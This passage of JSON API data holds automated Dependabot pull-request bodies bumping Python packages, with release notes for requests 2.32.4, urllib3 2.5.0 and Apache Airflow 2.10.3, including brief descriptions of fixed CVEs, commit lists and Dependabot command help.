(2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.32.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.19 to 2.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.5.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eSecurity issues\u003c/h1\u003e\n\u003cp\u003eurllib3 2.5.0 fixes two moderate security issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePool managers now properly control redirects when \u003ccode\u003eretries\u003c/code\u003e is passed — CVE-2025-50181 reported by \u003ca href=\"https://github.com/sandumjacob\"\u003e\u003ccode\u003e@​sandumjacob\u003c/code\u003e\u003c/a\u003e (5.3 Medium, GHSA-pq67-6m6q-mj2v)\u003c/li\u003e\n\u003cli\u003eRedirects are now controlled by urllib3 in the Node.js runtime — CVE-2025-50182 (5.3 Medium, GHSA-48p4-8xcf-vxj5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14. See \u003ca href=\"https://peps.python.org/pep-0784/\"\u003ePEP 784\u003c/a\u003e for more information. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3610\"\u003e#3610\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3612\"\u003e#3612\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3581\"\u003e#3581\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3522\"\u003e#3522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3567\"\u003e#3567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3571\"\u003e#3571\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3555\"\u003e#3555\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eMisc\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3550\"\u003e#3550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3566\"\u003e#3566\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.5.0 (2025-06-18)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14.\nSee \u003ccode\u003ePEP 784 \u0026lt;https://peps.python.org/pep-0784/\u0026gt;\u003c/code\u003e_ for more information. (\u003ccode\u003e[#3610](https://github.com/urllib3/urllib3/issues/3610) \u0026lt;https://github.com/urllib3/urllib3/issues/3610\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ccode\u003e[#3612](https://github.com/urllib3/urllib3/issues/3612) \u0026lt;https://github.com/urllib3/urllib3/issues/3612\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a security issue where restricting the maximum number of followed\nredirects at the \u003ccode\u003eurllib3.PoolManager\u003c/code\u003e level via the \u003ccode\u003eretries\u003c/code\u003e parameter\ndid not work.\u003c/li\u003e\n\u003cli\u003eMade the Node.js runtime respect redirect parameters such as \u003ccode\u003eretries\u003c/code\u003e\nand \u003ccode\u003eredirects\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ccode\u003e[#3581](https://github.com/urllib3/urllib3/issues/3581) \u0026lt;https://github.com/urllib3/urllib3/issues/3581\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ccode\u003e[#3615](https://github.com/urllib3/urllib3/issues/3615) \u0026lt;https://github.com/urllib3/urllib3/issues/3615\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.4.0 (2025-04-10)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ccode\u003e[#3522](https://github.com/urllib3/urllib3/issues/3522) \u0026lt;https://github.com/urllib3/urllib3/issues/3522\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ccode\u003e[#3567](https://github.com/urllib3/urllib3/issues/3567) \u0026lt;https://github.com/urllib3/urllib3/issues/3567\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ccode\u003e[#3571](https://github.com/urllib3/urllib3/issues/3571) \u0026lt;https://github.com/urllib3/urllib3/issues/3571\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ccode\u003e[#3555](https://github.com/urllib3/urllib3/issues/3555) \u0026lt;https://github.com/urllib3/urllib3/issues/3555\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ccode\u003e[#3550](https://github.com/urllib3/urllib3/issues/3550) \u0026lt;https://github.com/urllib3/urllib3/issues/3550\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ccode\u003e[#3566](https://github.com/urllib3/urllib3/issues/3566) \u0026lt;https://github.com/urllib3/urllib3/issues/3566\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.3.0 (2024-12-22)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/aaab4eccc10c965897540b21e15f11859d0b62e7\"\u003e\u003ccode\u003eaaab4ec\u003c/code\u003e\u003c/a\u003e Release 2.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f\"\u003e\u003ccode\u003e7eb4a2a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857\"\u003e\u003ccode\u003ef05b132\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d03fe327a71d09728512217149f269763671f296\"\u003e\u003ccode\u003ed03fe32\u003c/code\u003e\u003c/a\u003e Fix HTTP tunneling with IPv6 in older Python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/11661e9bb4278e43d081f47a516e287a928c2206\"\u003e\u003ccode\u003e11661e9\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 3.28.0 to 3.29.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3624\"\u003e#3624\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/6a0ecc6b16fe30f721021b44a81d19615098c71e\"\u003e\u003ccode\u003e6a0ecc6\u003c/code\u003e\u003c/a\u003e Update v2 migration guide to 2.4.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3621\"\u003e#3621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8e32e60d9024c05bc6f7adda08bdf6c539d0b0d4\"\u003e\u003ccode\u003e8e32e60\u003c/code\u003e\u003c/a\u003e Raise exception for shutdown on a connection already released to the pool (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9996e0fbf90b77083ad3c73737a6c6395703faa9\"\u003e\u003ccode\u003e9996e0f\u003c/code\u003e\u003c/a\u003e Fix emscripten CI for Chrome 137+ (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3599\"\u003e#3599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/4fd1a99a59725faf0efc946ce3b6bc9a194420af\"\u003e\u003ccode\u003e4fd1a99\u003c/code\u003e\u003c/a\u003e Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3617\"\u003e#3617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c4b5917e911a90c8bf279448df8952a682294135\"\u003e\u003ccode\u003ec4b5917\u003c/code\u003e\u003c/a\u003e Add support for the new \u003ccode\u003ecompression.zstd\u003c/code\u003e module in Python 3.14 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3611\"\u003e#3611\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.19...2.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Armanidashh/solana-program-library/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Armanidashh/solana-program-library/pull/16","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Armanidashh%2Fsolana-program-library/issues/16","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/16/packages"}},{"old_version":"1.9.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-06-15T05:35:27.000Z","version_change":"1.9.0 → 1.11.0","issue":{"uuid":"2593260216","node_id":"PR_kwDOOK9uiM6akgK4","number":28,"state":"open","title":"chore(deps): bump the pip group across 11 directories with 6 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-15T05:35:27.000Z","updated_at":"2025-06-15T05:35:28.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"pip","update_count":6,"packages":[{"name":"apache-airflow","old_version":"2.6.3","new_version":"2.10.3","repository_url":"https://github.com/apache/airflow"},{"name":"requests","old_version":"2.31.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"requests","old_version":"2.23.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"py","old_version":"1.9.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"apache-airflow","old_version":"2.6.3","new_version":"2.10.3","repository_url":"https://github.com/apache/airflow"},{"name":"requests","old_version":"2.31.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 2 updates in the /composer/2022_airflow_summit directory: [apache-airflow](https://github.com/apache/airflow) and [requests](https://github.com/psf/requests).\nBumps the pip group with 2 updates in the /composer/airflow_1_samples directory: [requests](https://github.com/psf/requests) and [py](https://github.com/pytest-dev/py).\nBumps the pip group with 2 updates in the /composer/cicd_sample directory: [apache-airflow](https://github.com/apache/airflow) and [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /composer/rest directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /compute/auth directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /compute/encryption directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /compute/metadata directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /compute/oslogin directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /dataflow/gemma directory: [keras](https://github.com/keras-team/keras).\nBumps the pip group with 2 updates in the /dataflow/run-inference directory: [torch](https://github.com/pytorch/pytorch) and [transformers](https://github.com/huggingface/transformers).\nBumps the pip group with 1 update in the /iap directory: [requests](https://github.com/psf/requests).\n\nUpdates `apache-airflow` from 2.6.3 to 2.10.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/airflow/releases\"\u003eapache-airflow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eApache Airflow 2.10.3\u003c/h2\u003e\n\u003ch1\u003eSignificant Changes\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch2\u003eBug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproves the handling of value masking when setting Airflow variables for enhanced security.  (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43123\"\u003e#43123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43278\"\u003e#43278\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds support for task_instance_mutation_hook to handle mapped operators with index 0. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42661\"\u003e#42661\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43089\"\u003e#43089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes executor cleanup to properly handle zombie tasks when task instances are terminated. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43065\"\u003e#43065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds retry logic for HTTP 502 and 504 errors in internal API calls to handle webserver startup issues. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42994\"\u003e#42994\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43044\"\u003e#43044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRestores the use of separate sessions for writing and deleting RTIF data to prevent StaleDataError. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42928\"\u003e#42928\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43012\"\u003e#43012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes PythonOperator error by replacing hyphens with underscores in DAG names. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42993\"\u003e#42993\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproving validation of task retries to handle None values (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42532\"\u003e#42532\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42915\"\u003e#42915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes error handling in dataset managers when resolving dataset aliases into new datasets (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42733\"\u003e#42733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnables clicking on task names in the DAG Graph View to correctly select the corresponding task. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/38782\"\u003e#38782\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42697\"\u003e#42697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent redirect loop on /home with tags/last run filters (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42607\"\u003e#42607\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42609\"\u003e#42609\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42628\"\u003e#42628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport of host.name in OTEL metrics and usage of OTEL_RESOURCE_ATTRIBUTES in metrics (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42428\"\u003e#42428\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42604\"\u003e#42604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReduce eyestrain in dark mode with reduced contrast and saturation (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42567\"\u003e#42567\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42583\"\u003e#42583\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle ENTER key correctly in trigger form and allow manual JSON (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42525\"\u003e#42525\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42535\"\u003e#42535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure DAG trigger form submits with updated parameters upon keyboard submit (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42487\"\u003e#42487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42499\"\u003e#42499\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not attempt to provide not \u003ccode\u003estringified\u003c/code\u003e objects to UI via xcom if pickling is active (\u003ca 